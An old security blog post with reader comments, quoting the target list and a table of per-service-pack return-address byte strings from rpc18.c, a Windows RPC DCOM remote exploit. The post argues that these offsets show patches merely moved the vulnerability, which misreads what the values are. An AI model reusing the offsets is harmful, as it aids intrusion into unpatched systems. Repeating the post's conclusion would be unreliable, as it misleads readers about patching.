Tuesday, March 20, 2007

Exploit Longevity

Ever notice how some exploits just seem to stay around forever?

There is actually a simple, but in my opinion ugly, explanation for this. As usual an example can be worth a thousand words, and I’m going to use rpc18.c as an example:

//////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 18 Targets
// by pHrail and smurfy + some offsets by teos
//
// Targets:
// 0 Win2k Polish nosp ver 5.00.2195
// 1 Win2k Polish +sp3 ver 5.00.2195
// 2 Win2k Spanish +sp4
// 3 Win2k English nosp 1
// 4 Win2k English nosp 2
// 5 Win2k English +sp1
// 6 Win2k English +sp2 1
// 7 Win2k English +sp2 2
// 8 Win2k English +sp3 1
// 9 Win2k English +sp3 2
// 10 Win2k English +sp4

// 11 Win2k China +sp3
// 12 Win2k China +sp4
// 13 Win2k German +sp3
// 14 Win2k Japanese +sp2
// 15 WinXP English nosp ver 5.1.2600
// 16 WinXP English +sp1 1
// 17 WinXP English +sp1 2
// 18 WinXP English +sp2

//
/////////////////////////////////////////////////////////

Notice targets 3-10 are all English versions of Windows 2000 and 16-18 are all Windows XP. Now each target has a different patch level so it must be exploiting the exact same issue, but wait there is more. The next section below shows the offset where the exploit is located.

The text on each line in quotes is the location where the exploit is located in the program. The troubling issue is that for each patch level the location has changed. In other words instead of fixing the problem with the patch the location of the vulnerability is moved, and obviously, as rpc18.c shows, this is not an effective method.

/* Myam add OFFSETS*/
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */

3 comments:

Ed said...

define fixed. if the target moves and the exploit don't work no more, ain't it fixed? at least temporarily? didn't that take it out of the wild?

how long after a svc pack comes out does it take for the new address to be published out?

Ed said...

on another note, 2gnj.com says... tell us about the "warm toilet seat" class of security leaks...

Leonard said...

Ed,

That is a fair question, and I will define fixed, including degrees of fixed. To be able to give justice to the answer I have to provide some back ground to make sure we are on "the same page," as they say. In fact I don't think using the comment portion will do the question justice. Instead I have posted a new blog entry titled The Band-aid Approach